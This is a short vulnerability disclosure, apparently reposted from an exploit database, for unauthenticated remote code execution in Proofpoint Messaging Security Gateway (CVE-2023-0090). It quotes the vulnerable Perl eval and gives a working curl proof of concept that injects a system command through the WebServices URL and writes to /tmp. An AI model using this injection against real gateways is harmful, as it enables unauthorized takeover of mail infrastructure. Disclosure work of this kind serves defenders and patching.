## https://sploitus.com/exploit?id=PACKETSTORM:225273
# About
Security researcher: ly1g3, ly1g3[at]tuta.io
GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
Overview: Remote Code Execution - Unauthenticated RCE
CVE: CVE-2023-0090
Timeline:
* Discovered - ly1g3
* Reported - ly1g3
* Fixed - Proofpoint
# Proofpoint Messaging Security Gateway 8.18.4.73-8.18.4.73
Exploits for Proofpoint Messaging Security Gateway
## Remote Code Execution (RCE)
With access to the WebServices API unauthenticated RCE with admin privileges can be achieved.
## Technical
`Webservices.pm` does not sanitize or check user input. No authentication is required to reach the function but API access must be enable in settings to be able to do RCE. `$module` comes directly from user data and is evaluated.
```perl
my $module = (split(/\//,$uri))[1];
$module = SERVICE_MODULE_PREFIX() . "::\u$module";
...
eval("require $module");
```
## POC
Will create file called `abc` in `/tmp/`. Code run as `pps` user.
```bash
curl -k -vv "https://192.168.80.80:10010/ws/abc%2bsystem(%60id%20>%20\\\$\{SHELL:0:1\}tmp\\\$\{SHELL:0:1\}abc%60)"